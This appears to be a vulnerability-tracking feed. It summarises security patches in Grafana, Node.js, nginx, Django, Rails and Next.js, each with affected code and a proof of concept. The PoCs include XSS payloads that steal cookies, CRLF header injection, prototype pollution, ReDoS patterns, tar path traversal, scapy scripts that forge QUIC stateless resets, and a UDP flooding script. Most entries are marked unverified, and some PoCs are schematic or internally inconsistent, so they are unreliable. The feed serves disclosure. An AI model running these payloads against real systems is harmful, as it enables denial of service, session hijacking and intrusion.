Public dashboard CRUD endpoints (Delete, Update, ExistsEnabledByDashboardUid) were only checking the user's role/permissions but not validating that the public dashboard being operated on belonged to the same organization as the requesting user. This allowed an authenticated user with Editor+ permissions in Org B to delete, update, or check the existence of public dashboards belonging to Org A, without having access to the source dashboard. The patch adds org_id checks to all relevant database queries to enforce org isolation.

🔍 View Affected Code & PoC

Affected Code

func (d *PublicDashboardStoreImpl) Delete(ctx context.Context, uid string) (int64, error) {
	dashboard := &PublicDashboard{Uid: uid}
	var affectedRows int64
	err := d.sqlStore.WithDbSession(ctx, func(sess *db.Session) error {
		var err error
		affectedRows, err = sess.Delete(dashboard)

Proof of Concept

# Attacker is admin in OrgB (orgId=2), wants to delete a public dashboard in OrgA (orgId=1)
# They know the dashboardUid and public dashboard uid from prior reconnaissance
curl -X DELETE http://orgb_admin:password@localhost:3000/api/dashboards/uid/orgA_dashboard_uid/public-dashboards/orgA_pubdash_uid
# Before patch: deletion succeeds because only RBAC role is checked, not org ownership
# The Delete service call was: api.PublicDashboardService.Delete(c.Req.Context(), uid, dashboardUid)
# without passing c.GetOrgID(), so the store deleted any public dashboard matching uid regardless of org

🔥 HIGH UNVERIFIED XSS / Prototype Pollution

Mar 6, 2026, 08:24 AM — grafana/grafana

Commit: cf7d85c

Author: dependabot\[bot\]

DOMPurify 3.3.1 contained multiple security vulnerabilities: a bypass via jsdom's faulty raw-text tag parsing that could allow XSS payloads to pass through sanitization, a prototype pollution issue when working with custom elements, and a lenient config parsing issue in `_isValidAttribute`. These vulnerabilities could allow attackers to inject malicious HTML/JavaScript that bypasses DOMPurify's sanitization, leading to XSS attacks in Grafana's frontend which uses DOMPurify to sanitize user-supplied content.

🔍 View Affected Code & PoC

Affected Code

"dompurify": "3.3.1"

Proof of Concept

// Prototype pollution via custom elements in DOMPurify 3.3.1:
// An attacker could craft input like:
const payload = '<custom-element constructor="polluted"></custom-element>';
DOMPurify.sanitize(payload); // Could pollute Object.prototype

// XSS bypass via jsdom raw-text tag parsing:
const xssPayload = '<script type="text/plain"></script><img src=x onerror=alert(document.cookie)>';
// In jsdom environments, DOMPurify 3.3.1 might fail to sanitize this correctly,
// allowing the onerror handler to execute when rendered in a browser

⚠️ MEDIUM UNVERIFIED Regular Expression Denial of Service (ReDoS)

Mar 6, 2026, 08:34 AM — grafana/grafana

Commit: 333964d

Author: Jack Westbrook

The minimatch package prior to version 3.1.2 (and related versions) contained a ReDoS vulnerability (CVE-2022-3517) where specially crafted patterns could cause catastrophic backtracking in the regular expression engine. This patch upgrades minimatch from vulnerable versions (3.0.5, 9.0.3, 5.0.1, 7.4.6) to patched versions (3.1.4, 10.2.4, 5.1.9, 7.4.9) that fix the ReDoS issue. The vulnerability could allow an attacker to cause denial of service by providing a malicious glob pattern.

🔍 View Affected Code & PoC

Affected Code

minimatch: "npm:3.0.5"  // in @lerna/create and lerna dependencies
minimatch: "npm:9.0.3"  // in @nx/devkit
minimatch: "npm:5.0.1"  // version ^5.0.1
minimatch: "npm:7.4.6"  // version ^7.4.3

Proof of Concept

const minimatch = require('[email protected]');
// CVE-2022-3517: ReDoS with crafted input
// The following pattern causes catastrophic backtracking:
const start = Date.now();
minimatch('a' + 'a'.repeat(25) + '!', '{' + 'a,' .repeat(25) + 'b}');
console.log('Time:', Date.now() - start, 'ms'); // Takes exponentially long time, causing DoS

🔥 HIGH UNVERIFIED Prototype Pollution

Mar 6, 2026, 08:12 AM — grafana/grafana

Commit: d0a5b71

Author: dependabot\[bot\]

The immutable library versions prior to 5.1.5 contained a Prototype Pollution vulnerability (Improperly Controlled Modification of Object Prototype Attributes). This allowed attackers to manipulate JavaScript object prototypes through specially crafted keys like '__proto__', 'constructor', or 'prototype', potentially affecting all objects in the application. The patch upgrades immutable from 5.1.4 to 5.1.5 which fixes this vulnerability.

🔍 View Affected Code & PoC

Affected Code

"immutable": "5.1.4"

Proof of Concept

const { fromJS } = require('[email protected]');
const malicious = fromJS(JSON.parse('{"__proto__": {"polluted": true}}'));
console.log(({}).polluted); // true - prototype has been polluted
// This allows attackers to inject properties into Object.prototype,
// affecting all subsequent object property lookups in the application

🔥 HIGH UNVERIFIED Use-After-Free / Memory Corruption

Mar 6, 2026, 06:01 AM — nodejs/node

Commit: a06e789

Author: Gerhard Stöbich

When pipelined HTTP requests arrive in a single TCP segment, llhttp_execute() processes all of them in one call. If a synchronous 'close' event handler calls freeParser() mid-execution, cleanParser() nulls out parser state while llhttp_execute() is still on the call stack, causing use-after-free/null-pointer dereference crashes on subsequent callbacks. The patch adds an is_being_freed_ flag that causes the Proxy::Raw callback to return early (HPE_USER) when set, aborting llhttp_execute() before it accesses freed/nulled parser state.

🔍 View Affected Code & PoC

Affected Code

if (parser->connectionsList_ != nullptr) {
  parser->connectionsList_->Pop(parser);
  parser->connectionsList_->PopActive(parser);
}

Proof of Concept

const { createServer } = require('http');
const { connect } = require('net');
const server = createServer((req, res) => {
  // Synchronously emit 'close' to trigger freeParser() while llhttp_execute() is still on the stack
  req.socket.emit('close');
  res.end();
});
server.listen(0, () => {
  const client = connect(server.address().port);
  // Send two pipelined requests in one write - processed by a single llhttp_execute() call
  // When 'close' fires during first request, parser is freed while second request is still being parsed
  client.end(
    'GET / HTTP/1.1\r\nHost: localhost\r\nConnection: keep-alive\r\n\r\n' +
    'GET / HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\n\r\n'
  );
});
// Result before patch: process crashes with SIGSEGV or assertion failure due to null pointer dereference

⚠️ MEDIUM UNVERIFIED ReDoS (Regular Expression Denial of Service)

Mar 3, 2026, 11:14 PM — nodejs/node

Commit: 330e3ee

Author: dependabot\[bot\]

The minimatch library versions before 3.1.5 contained a ReDoS vulnerability where specially crafted glob patterns could cause catastrophic backtracking in regular expression matching, leading to excessive CPU consumption and denial of service. The fix in 3.1.5 includes limiting recursion in pattern matching to prevent exponential backtracking. However, this affects only developer tooling (clang-format), not the Node.js runtime itself, limiting real-world impact.

🔍 View Affected Code & PoC

Affected Code

"version": "3.1.3",
"resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.3.tgz",
"integrity": "sha512-M2GCs7Vk83NxkUyQV1bkABc4yxgz9kILhHImZiBPAZ9ybuvCb0/H7lEl5XvIg3g+9d4eNotkZA5IWwYl0tibaA=="

Proof of Concept

const minimatch = require('minimatch');
// This pattern causes catastrophic backtracking in minimatch < 3.1.5
const maliciousPattern = '{' + 'a,'.repeat(100) + 'a}';
console.time('match');
minimatch('aaaaaaaaaaaaaaaaaaaaaaaaa', maliciousPattern);
console.timeEnd('match'); // Takes extremely long time, blocking event loop

🔥 HIGH UNVERIFIED Path Traversal / Arbitrary File Overwrite

Mar 3, 2026, 02:57 PM — grafana/grafana

Commit: 44fe577

Author: Jack Westbrook

The `tar` npm package versions 6.x and earlier contain a path traversal vulnerability (CVE-2024-28863 and related CVEs) where specially crafted tar archives can write files outside the intended extraction directory. By bumping `tar` from version 6.x to 7.x, this patch removes the vulnerable version and its dependency chain (including the old `cacache@^15.2.0` which depended on `tar@^6.0.2`). The vulnerability allowed an attacker to craft a malicious tarball that, when extracted, could overwrite arbitrary files on the filesystem.

🔍 View Affected Code & PoC

Affected Code

"cacache@npm:^15.2.0":
  tar: "npm:^6.0.2"
  ...
(tar 6.x is vulnerable to path traversal via crafted archive entries)

Proof of Concept

Using tar 6.x: create a malicious tarball with an entry path like '../../../../etc/cron.d/malicious' that traverses outside the extraction directory. When extracted via tar.extract({cwd: '/safe/dir'}), the file is written to /etc/cron.d/malicious instead. Example: `const tar = require('tar'); tar.x({file: 'malicious.tar', cwd: '/tmp/safe'})` where malicious.tar contains an entry with path '../../../tmp/pwned' using a crafted header with absolute or traversal path sequences.

⚠️ MEDIUM UNVERIFIED Denial of Service (DoS)

Jan 30, 2026, 01:52 AM — django/django

Commit: 951ffb3

Author: Natalia

Django's URLField.to_python() used urlsplit() to detect URL schemes, which on Windows performs NFKC Unicode normalization. This normalization is disproportionately slow for inputs containing certain Unicode characters (e.g., characters like '¾'), allowing an attacker to craft a POST payload that causes excessive CPU consumption. The patch replaces urlsplit() with str.partition(':') for scheme detection, avoiding Unicode normalization entirely.

🔍 View Affected Code & PoC

Affected Code

try:
    return list(urlsplit(url))
except ValueError:
    # urlsplit can raise a ValueError with some
    # misformatted URLs.
    raise ValidationError(self.error_messages["invalid"], code="invalid")

Proof of Concept

On Windows, send a POST request with a URLField value containing a large string of Unicode characters that trigger slow NFKC normalization:

import requests
# Craft a payload with characters that cause slow NFKC normalization
payload = {'url_field': 'http://' + '\u00be' * 50000}  # '¾' repeated 50000 times
requests.post('http://target-django-app/form/', data=payload)
# This causes urlsplit() to perform slow Unicode normalization on Windows,
# consuming excessive CPU and potentially blocking the server's worker threads.

💡 LOW UNVERIFIED Incorrect Permissions / Race Condition (umask)

Jan 21, 2026, 09:03 PM — django/django

Commit: 019e44f

Author: Natalia

In multi-threaded Django applications, the file-based cache backend and filesystem storage used temporary umask changes (via os.umask()) to control directory permissions when creating directories. Because os.umask() is a process-wide operation, a temporary umask change in one thread could affect directory/file creation in other threads, resulting in file system objects being created with unintended (potentially overly permissive) permissions. The patch replaces the umask manipulation approach with a safe_makedirs() function that uses os.chmod() after os.mkdir() to enforce the exact requested permissions.

🔍 View Affected Code & PoC

Affected Code

old_umask = os.umask(0o077)
try:
    os.makedirs(self._dir, 0o700, exist_ok=True)
finally:
    os.umask(old_umask)

Proof of Concept

import threading, os, tempfile, time
# In a multi-threaded Django app using FileBasedCache:
# Thread A calls _createdir() which sets umask to 0o077
# Thread B simultaneously creates a file/directory expecting default umask (e.g., 0o022)
# Thread B's file ends up with permissions masked by Thread A's 0o077 umask
# Concrete example:
tmp = tempfile.mkdtemp()
def thread_a():
    # Simulates FileBasedCache._createdir() - sets umask to 0o077
    os.umask(0o077)
    time.sleep(0.01)  # holds umask while thread B runs
    os.umask(0o022)  # restore

def thread_b():
    time.sleep(0.005)  # starts after thread A changes umask
    path = os.path.join(tmp, 'upload_dir')
    os.makedirs(path, 0o755, exist_ok=True)  # intended: rwxr-xr-x
    print(oct(os.stat(path).st_mode))  # actual: 0o700 (too restrictive) due to umask 0o077

ta = threading.Thread(target=thread_a)
tb = threading.Thread(target=thread_b)
ta.start(); tb.start(); ta.join(); tb.join()

🔥 HIGH UNVERIFIED HTTP Header Injection (CRLF Injection)

Mar 2, 2026, 07:10 PM — nodejs/node

Commit: acb79bc

Author: Matteo Collina

The `path` property on `ClientRequest` was only validated against `INVALID_PATH_REGEX` at construction time. After construction, an attacker (or vulnerable application code) could reassign `req.path` to include CRLF sequences (`\\r\\n`), which would then be flushed verbatim to the socket in `_implicitHeader()`, allowing injection of arbitrary HTTP headers or request smuggling. The patch adds a getter/setter using a symbol-backed property so validation runs on every assignment.

🔍 View Affected Code & PoC

Affected Code

this.path = options.path || '/';

Proof of Concept

const http = require('http');
const req = new http.ClientRequest({ host: 'example.com', port: 80, path: '/safe', method: 'GET', createConnection: () => {} });
// After construction, mutate path with CRLF injection
req.path = '/safe\r\nX-Injected: malicious\r\nFoo: bar';
// When _implicitHeader() fires, it sends: GET /safe\r\nX-Injected: malicious\r\nFoo: bar HTTP/1.1
// This injects arbitrary headers into the outgoing HTTP request

🔥 HIGH UNVERIFIED CRLF Injection

Mar 2, 2026, 12:49 PM — nodejs/node

Commit: e78bf55

Author: Richard Clarke

The `writeEarlyHints()` function in Node.js HTTP server directly concatenated user-supplied header names and values into the raw HTTP/1.1 response without any validation. Unlike `setHeader()` and `writeHead()`, no calls to `validateHeaderName()`, `validateHeaderValue()`, or `checkInvalidHeaderChar()` were made, allowing CRLF sequences to pass through unchecked and inject arbitrary HTTP headers or entire responses. The patch adds proper validation for header names, values, and Link header URLs.

🔍 View Affected Code & PoC

Affected Code

const keys = ObjectKeys(hints);
  for (let i = 0; i < keys.length; i++) {
    const key = keys[i];
    if (key !== 'link') {
      head += key + ': ' + hints[key] + '\r\n';
    }
  }

Proof of Concept

const http = require('http');
const server = http.createServer((req, res) => {
  // Inject a fake Set-Cookie header via CRLF in a non-link header value
  res.writeEarlyHints({
    'link': '</style.css>; rel=preload; as=style',
    'X-Custom': 'value\r\nSet-Cookie: session=hijacked; Path=/'
  });
  res.end('hello');
});
// The raw HTTP response will contain an injected 'Set-Cookie: session=hijacked' header
// because 'value\r\nSet-Cookie: session=hijacked; Path=/' is concatenated directly into the response.
// Similarly, injecting via header name: { 'X-Foo\r\nSet-Cookie: evil=1': 'v' }

⚠️ MEDIUM UNVERIFIED Header Injection / Information Disclosure

Mar 2, 2026, 12:49 AM — nodejs/node

Commit: a6e9e32

Author: Node.js GitHub Bot

The cache interceptor was spreading `result.vary` headers directly into revalidation requests without filtering out `null` values. When a request header specified in the `Vary` header was absent from the original request, it was stored as `null` in the cache entry's `vary` map. Spreading this `null` value into the revalidation headers could corrupt the header object and potentially send unintended null-valued headers to the server. The patch adds a null-check guard so only present header values are forwarded during revalidation.

🔍 View Affected Code & PoC

Affected Code

if (result.vary) {
  headers = {
    ...headers,
    ...result.vary
  }
}

Proof of Concept

// Server responds with Vary: accept-encoding
// Original request does NOT include accept-encoding header
// Cache stores vary = { 'accept-encoding': null }
// On revalidation, the spread { ...headers, ...result.vary } produces:
// { 'if-modified-since': '...', 'accept-encoding': null }
// Sending a request with a null-valued header could bypass server-side Vary matching
// or cause unexpected behavior in downstream servers/proxies that interpret null differently.
// Trigger: make a cached request without 'accept-encoding', wait for stale-while-revalidate,
// observe the revalidation request incorrectly includes 'accept-encoding: null'

⚠️ MEDIUM UNVERIFIED ReDoS (Regular Expression Denial of Service)

Mar 1, 2026, 02:27 PM — nodejs/node

Commit: 4d0cb65

Author: Node.js GitHub Bot

This update to minimatch 10.2.4 adds mitigations for ReDoS vulnerabilities by introducing `maxGlobstarRecursion` and `maxExtglobRecursion` limits to prevent catastrophic backtracking when processing untrusted glob patterns. The README explicitly acknowledges that user-controlled glob patterns can be weaponized for DoS attacks. The patch adds depth tracking and recursion limits for extglob and globstar patterns to cap the complexity of the generated regular expressions.

🔍 View Affected Code & PoC

Affected Code

// No recursion depth limits on extglob nesting or globstar patterns
// Untrusted input could generate catastrophically backtracking RegExp
const assertValidPattern: (pattern: any) => void = (
  pattern: any,
): asserts pattern is string => {

Proof of Concept

const { minimatch } = require('minimatch');
// Before the patch, deeply nested extglob patterns from untrusted input
// could cause catastrophic backtracking:
const evilPattern = '*(a|*(a|*(a|*(a|*(a|*(a|*(a|*(a|*(a|*(a))))))))))';
const evilInput = 'a'.repeat(30);
// This would hang/crash Node.js process due to ReDoS
minimatch(evilInput, evilPattern);

🔥 HIGH UNVERIFIED Information Disclosure (Uninitialized Memory Exposure)

Feb 27, 2026, 06:36 PM — nodejs/node

Commit: cc6c188

Author: Mert Can Altin

Before the patch, Buffer.concat() computed the total allocation size using the user-controllable `.length` property of each element, then allocated with `Buffer.allocUnsafe(length)`. For typed arrays, an attacker could spoof a larger `.length` via a getter, causing an oversized uninitialized Buffer to be returned, leaking process memory contents. The patch fixes this by using the typed array’s intrinsic byte length (`TypedArrayPrototypeGetByteLength`) and by allocating via `allocate` plus explicit zero-filling of any slack.

🔍 View Affected Code & PoC

Affected Code

for (let i = 0; i < list.length; i++) {
  if (list[i].length) {
    length += list[i].length;
  }
}
const buffer = Buffer.allocUnsafe(length);

Proof of Concept

/* Run on a Node version before cc6c18802dc6dfc041f359bb417187a7466e9e8f */

// Attacker-controlled Uint8Array with spoofed .length getter inflates allocation size.
const u8_1 = new Uint8Array([1, 2, 3, 4]);
const u8_2 = new Uint8Array([5, 6, 7, 8]);
Object.defineProperty(u8_1, 'length', { get() { return 1024 * 1024; } }); // 1MB

const b = Buffer.concat([u8_1, u8_2]);
console.log('returned length:', b.length); // BEFORE PATCH: 1048576 + 8 (or similar huge value)

// Only first 8 bytes are controlled; the rest is uninitialized heap data.
// Demonstrate leak by showing non-zero/unexpected bytes in the tail.
let leaked = 0;
for (let i = 8; i < b.length; i++) {
  if (b[i] !== 0) { leaked++; if (leaked > 32) break; }
}
console.log('non-zero bytes after concatenated data (leak indicator):', leaked);

// Print a slice of leaked memory.
console.log('tail sample:', b.subarray(8, 8 + 64));

🔥 HIGH UNVERIFIED Improper Authentication / Cryptographic Token Misbinding (QUIC Stateless Reset token exposure leading to DoS)

Feb 26, 2026, 02:36 PM — nginx/nginx

Commit: f72c745

Author: Roman Arutyunyan

Before the patch, the QUIC stateless reset token was derived only from a shared secret and the connection ID, making the token identical across workers. In a multi-worker configuration with packet steering, an attacker could intentionally route a victim connection's packet to a different worker to trigger emission/observation of the stateless reset token, then forge a QUIC Stateless Reset to immediately terminate the victim connection (remote DoS). The patch binds the derived token to the worker number by incorporating ngx_worker into the KDF input, making tokens differ per worker and preventing cross-worker token acquisition/abuse.

🔍 View Affected Code & PoC

Affected Code

tmp.data = secret;
 tmp.len = NGX_QUIC_SR_KEY_LEN;

 if (ngx_quic_derive_key(c->log, "sr_token_key", &tmp, cid, token,
                         NGX_QUIC_SR_TOKEN_LEN) != NGX_OK) {

Proof of Concept

Prereqs: nginx built with QUIC, configured with multiple workers (e.g., worker_processes 4;), and client behind NAT or attacker can spoof/own a 5-tuple to influence RSS/ECMP so packets land on different workers.

1) Establish a QUIC connection from victim client (or attacker-controlled client) to nginx and note the server-chosen DCID used in 1-RTT packets.

2) Force a packet for that existing connection to be processed by the "wrong" worker (e.g., by changing UDP source port so Linux RSS hashes to another receive queue/worker while keeping the same QUIC DCID):
   # pseudo: send a 1-RTT packet with same DCID but altered UDP 5-tuple
   python3 - <<'PY'
from scapy.all import *
# Requires QUIC packet crafting; below is schematic.
SERVER_IP='1.2.3.4'
SERVER_PORT=443
SRC_IP='victim-or-attacker-ip'
NEW_SPORT=40000  # choose to steer to different worker via RSS hash
DCID=bytes.fromhex('00112233445566778899aabbccddeeff')  # observed DCID
# payload must be a syntactically valid short-header 1-RTT QUIC packet for that DCID
quic_pkt = b'\x40' + DCID + b'\x00'*32
send(IP(src=SRC_IP,dst=SERVER_IP)/UDP(sport=NEW_SPORT,dport=SERVER_PORT)/Raw(load=quic_pkt), verbose=False)
PY

3) Observe that nginx responds with a QUIC Stateless Reset on that 5-tuple. Capture it with tcpdump:
   sudo tcpdump -ni any udp port 443 -vv -X
   The Stateless Reset contains a 16-byte token at the end of the UDP payload.

4) Use the captured token to kill the real connection: send a forged Stateless Reset to the victim's original 5-tuple (or to the peer that will accept it), with the token at the end:
   python3 - <<'PY'
from scapy.all import *
SERVER_IP='1.2.3.4'
VICTIM_IP='victim-ip'
SPORT=443
DPORT=54321  # victim's UDP port used for the QUIC connection
TOKEN=bytes.fromhex('deadbeef'*4)  # replace with captured 16-byte token
# QUIC Stateless Reset is an unpredictable-looking packet >= 21 bytes, token must be last 16 bytes
payload = b'\x00'*32 + TOKEN
send(IP(src=SERVER_IP,dst=VICTIM_IP)/UDP(sport=SPORT,dport=DPORT)/Raw(load=payload), verbose=False)
PY

Expected result (pre-patch): the victim QUIC stack accepts the Stateless Reset and immediately closes the connection (DoS). Post-patch: token differs per worker, so a token obtained via wrong-worker routing will not validate for the victim's actual worker-path, and the forged reset is ignored.

🔥 HIGH UNVERIFIED NULL Pointer Dereference (Remote Denial of Service)

Feb 24, 2026, 01:33 AM — nginx/nginx

Commit: c67bf94

Author: user.email

Before the patch, the QUIC OpenSSL compatibility keylog callback discarded failures from ngx_quic_compat_set_encryption_secret(). Under memory pressure (allocation failure), the encryption context (secret-&gt;ctx) could remain NULL, yet ngx_quic_compat_create_record() would proceed to encrypt and dereference the NULL ctx, crashing the NGINX worker. The patch checks the return value, marks the QUIC connection as errored to fail the handshake cleanly, and adds a NULL guard in record creation to prevent the crash.

🔍 View Affected Code & PoC

Affected Code

(void) ngx_quic_compat_set_encryption_secret(c, &com->keys, level,
                                             cipher, secret, n);
...
secret = &rec->keys->secret;
ngx_memcpy(nonce, secret->iv.data, secret->iv.len);
/* later: encrypt using secret->ctx (could be NULL) */

Proof of Concept

# PoC: remote crash via QUIC handshake while forcing allocation failure (OOM)
# This demonstrates an exploitable, remotely triggerable DoS when QUIC is enabled
# and the worker runs out of memory during the TLS keylog callback.

# 1) Run nginx with QUIC enabled (HTTP/3) in a memory-cgroup limited container.
# Example docker run limiting memory so malloc failures occur during handshake:
#   docker run --rm -it --memory=64m --pids-limit=256 -p 443:443/udp nginx:quic
# (Use an nginx build/config that enables QUIC and listens on 443 quic.)

# 2) From another host, flood with QUIC handshakes to increase memory pressure:
# Using ngtcp2's client to rapidly initiate TLS/QUIC handshakes:
for i in $(seq 1 2000); do
  ngtcp2-client --exit-on-all-streams-close --timeout=1 127.0.0.1 443 >/dev/null 2>&1 &
done
wait

# Expected behavior BEFORE patch:
# - Under memory pressure, ngx_quic_compat_set_encryption_secret() can fail,
#   leaving secret->ctx NULL.
# - A subsequent CRYPTO record creation attempts to encrypt using NULL ctx,
#   leading to SIGSEGV and worker process crash (remote DoS).
#   (In logs/dmesg you'll see a segfault in the worker.)

# Expected behavior AFTER patch:
# - Handshake fails with internal error; worker does not crash.

🔥 HIGH UNVERIFIED Sensitive Data Exposure (Secrets persisted to cache)

Feb 26, 2026, 02:11 PM — vercel/next.js

Commit: 2307bf6

Author: Tobias Koppers

Before the patch, `ProcessEnv::read_all()` returned a serializable `EnvMap`, which could be automatically persisted into Turbopack/Next.js' on-disk persistent cache. This meant any process environment variable (including secrets like API keys and tokens) could be written to disk and later recovered by anyone with read access to the cache directory (e.g., another local user, CI artifact consumers, or a compromised build agent). The patch introduces `TransientEnvMap` with `serialization = "none"` and changes `read_all()` to return it, preventing env vars from being persisted and forcing them to be re-read from the process environment after cache restore.

🔍 View Affected Code & PoC

Affected Code

/// Reads all env variables into a Map
#[turbo_tasks::function]
fn read_all(self: Vc<Self>) -> Vc<EnvMap>;

// e.g.
Vc::cell(env_snapshot())

Proof of Concept

Prereq: a Next.js/Turbopack project using persistent caching (default local cache dir).

1) Run a build with a secret in the environment so it gets captured by `read_all()`:

   $ export AWS_SECRET_ACCESS_KEY='POC_SUPER_SECRET_123'
   $ export NEXT_TELEMETRY_DISABLED=1
   $ next dev   # or a turbopack-enabled build that populates the persistent cache

2) Search the on-disk cache for the secret (the exact path can vary by platform, but typically under the project’s .next cache or Turbopack cache directory):

   $ rg -n "POC_SUPER_SECRET_123" .next/ 2>/dev/null || true
   $ rg -n "POC_SUPER_SECRET_123" .turbo/ 2>/dev/null || true
   $ rg -n "POC_SUPER_SECRET_123" . 2>/dev/null | head

Expected vulnerable behavior (before patch): the secret string is found in one or more cache files because `EnvMap` was auto-serialized.

Impact demonstration: any actor who can read that cache directory (e.g., another user on the machine, or someone who downloads CI cache artifacts) can recover `AWS_SECRET_ACCESS_KEY` by grepping the cache.

⚠️ MEDIUM UNVERIFIED Denial of Service (DoS) / Amplification via Stateless Reset flooding

Feb 25, 2026, 05:09 PM — nginx/nginx

Commit: e6ffe83

Author: Sergey Kandaurov

Before the patch, nginx would generate and send a QUIC Stateless Reset for every incoming packet that triggered the stateless reset path, with no per-source rate limiting. An attacker could spoof many UDP packets (often with spoofed source IPs) to force the server to spend CPU on hashing/random generation and to emit many Stateless Reset packets, creating resource exhaustion and reflected traffic. The patch adds a per-second Bloom-filter-based limiter keyed by source address so repeated triggers from the same address are declined.

🔍 View Affected Code & PoC

Affected Code

ngx_int_t
ngx_quic_send_stateless_reset(ngx_connection_t *c, ngx_quic_conf_t *conf,
    ngx_quic_header_t *pkt)
{
    ...
    if (pkt->len <= NGX_QUIC_MIN_SR_PACKET) {
        len = pkt->len - 1;
    ...
    return ngx_quic_send(c, buf, len, c->sockaddr, c->socklen);
}

Proof of Concept

Prereq: QUIC enabled on nginx (listen ... quic).

1) Flood the server with UDP datagrams that look like short-header QUIC packets with a random DCID, causing nginx to respond with Stateless Reset repeatedly.

Example Python flooder (sends many packets; if you can spoof, set a victim IP as source to demonstrate reflection):

`​`​`​python
import os, socket, time

target_ip = "NGINX_IP"
target_port = 443  # QUIC port

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

# QUIC short header first byte: 0b010xxxxx (0x40..0x7f). Use 0x40.
# Fill rest with random bytes to simulate unknown connection id etc.
pkt_len = 1200
payload = bytes([0x40]) + os.urandom(pkt_len - 1)

end = time.time() + 10
while time.time() < end:
    s.sendto(payload, (target_ip, target_port))
`​`​`​

Expected behavior BEFORE patch: server emits a Stateless Reset for essentially every received datagram (observable with tcpdump on server: `udp and port 443` showing many outgoing packets) and CPU/network usage increases proportionally to attack rate.

Expected behavior AFTER patch: for a given source address, after the first reset in a 1-second window, subsequent reset attempts are mostly dropped (function returns NGX_DECLINED), significantly reducing outgoing packets and server work per attacker address.

If spoofing is available (raw sockets), repeat with varying spoofed source IPs to demonstrate reflection potential; without spoofing, the same script still demonstrates server-side CPU/network DoS from a single host.
CONFIRMED

⚠️ MEDIUM CONFIRMED Cross-Site Scripting (XSS)

Feb 24, 2026, 08:56 PM — rails/rails

Commit: e905b2e

Author: Mike Dalessio

The markdown conversion functionality was vulnerable to XSS attacks through malicious javascript: URLs that could bypass protocol filtering using obfuscation techniques like leading whitespace, HTML entity encoding, or case variations. The patch fixes this by delegating URI validation to Rails::HTML::Sanitizer.allowed_uri? which properly handles these bypass attempts.

🔍 View Affected Code & PoC

Affected Code

if (href = node["href"]) && allowed_href_protocol?(href)
  "[#{inner}](#{href})"
else
  inner
end

Proof of Concept

<a href=" javascript:alert('XSS')">Click me</a> or <a href="&#106;avascript:alert('XSS')">Click me</a> - these would be converted to markdown links that execute JavaScript when clicked, bypassing the original protocol validation

🔥 HIGH UNVERIFIED Authentication Bypass

Feb 24, 2026, 08:05 PM — grafana/grafana

Commit: f1b77b8

Author: colin-stuart

The code allowed SAML authentication to create duplicate user_auth records for SCIM-provisioned users instead of updating existing ones. An attacker could exploit this by logging in via SAML with a SCIM user's credentials to create a new auth record with their own AuthID, potentially bypassing access controls or creating authentication confusion.

🔍 View Affected Code & PoC

Affected Code

if identity.AuthenticatedBy == login.GenericOAuthModule {
    query := &login.GetAuthInfoQuery{AuthModule: identity.AuthenticatedBy, UserId: usr.ID}
    userAuth, err = s.authInfoService.GetAuthInfo(ctx, query)

Proof of Concept

1. SCIM provisions user with email '[email protected]' and creates user_auth record with empty AuthID
2. Attacker performs SAML login with same email '[email protected]' but different AuthID 'attacker-saml-id' 
3. Code fails to find existing auth record by AuthID lookup, creates new user_auth record instead of updating existing one
4. Result: User now has two authentication methods - original SCIM provision + attacker's SAML AuthID, allowing potential unauthorized access
CONFIRMED

🔥 HIGH CONFIRMED Null Pointer Dereference

Feb 24, 2026, 07:51 PM — nodejs/node

Commit: 84d1e6c

Author: Nora Dossche

The code failed to check if BIO_meth_new() returns NULL before passing the result to BIO_meth_set_* functions, causing a null pointer dereference. This could lead to application crashes and potential denial of service when SSL/TLS operations are initiated under memory pressure conditions.

🔍 View Affected Code & PoC

Affected Code

BIO_METHOD* method = BIO_meth_new(BIO_TYPE_MEM, "node.js SSL buffer");
BIO_meth_set_write(method, Write);

Proof of Concept

Trigger memory exhaustion by creating many large objects, then initiate SSL/TLS connection which calls NodeBIO::GetMethod(). When BIO_meth_new() fails and returns NULL due to memory pressure, the subsequent BIO_meth_set_write(NULL, Write) call will dereference NULL pointer causing segmentation fault and application crash.

⚠️ MEDIUM UNVERIFIED Regular Expression Denial of Service (ReDoS)

Feb 24, 2026, 06:11 PM — nodejs/node

Commit: ec33dd9

Author: Node.js GitHub Bot

The minimatch library had a vulnerability where multiple consecutive asterisks (*) in glob patterns could cause exponential backtracking in the generated regular expression, leading to CPU exhaustion. The patch fixes this by coalescing multiple stars into a single star pattern, preventing the ReDoS condition.

🔍 View Affected Code & PoC

Affected Code

if (c === '*') {
  re += noEmpty && glob === '*' ? starNoEmpty : star;
  hasMagic = true;
  continue;
}

Proof of Concept

const { minimatch } = require('minimatch');
// This would cause exponential backtracking and hang the process
minimatch('a'.repeat(50), '*'.repeat(50) + 'x');

⚠️ MEDIUM UNVERIFIED Man-in-the-Middle Attack / Insufficient Certificate Validation

Feb 24, 2026, 09:32 AM — grafana/grafana

Commit: f13db65

Author: Maksym Revutskyi

The code before the patch used HTTP transport without proper TLS certificate validation when communicating with external image renderer services. This allowed attackers to intercept HTTPS communications through man-in-the-middle attacks, potentially exposing authentication tokens and sensitive data. The patch adds support for custom CA certificates to enable proper certificate validation.

🔍 View Affected Code & PoC

Affected Code

var netTransport = &http.Transport{
	Proxy: http.ProxyFromEnvironment,
	Dial: (&net.Dialer{
		Timeout: 30 * time.Second,
	}).Dial,
	TLSHandshakeTimeout: 5 * time.Second,
}

Proof of Concept

1. Set up a malicious proxy/MITM tool like mitmproxy with a self-signed certificate
2. Configure network to route Grafana's image renderer traffic through the proxy
3. The original code would accept any certificate without validation, allowing interception of requests containing X-Auth-Token headers
4. Command: `mitmproxy -p 8080 --certs *=cert.pem` then configure Grafana to use renderer at https://malicious-renderer:8081 - the auth tokens would be captured in plaintext

⚠️ MEDIUM UNVERIFIED Information Disclosure

Feb 11, 2026, 10:22 PM — rails/rails

Commit: 4c07766

Author: Mark Bastawros

The custom inspect methods in various Rails classes could potentially expose sensitive internal state or configuration data through debug output, error messages, or logs. The patch replaces these with a controlled inspection mechanism that only shows explicitly whitelisted instance variables.

🔍 View Affected Code & PoC

Affected Code

def inspect # :nodoc:
  "#<#{self.class.name}:#{'%#016x' % (object_id << 1)}>"
end

Proof of Concept

# In a Rails console or error handler:
connection = ActionCable::Connection::Base.new(server, env)
connection.instance_variable_set(:@secret_token, 'sensitive_data')
puts connection.inspect
# Before patch: Could expose @secret_token and other internals
# After patch: Only shows basic object info without sensitive variables

⚠️ MEDIUM UNVERIFIED Information Disclosure

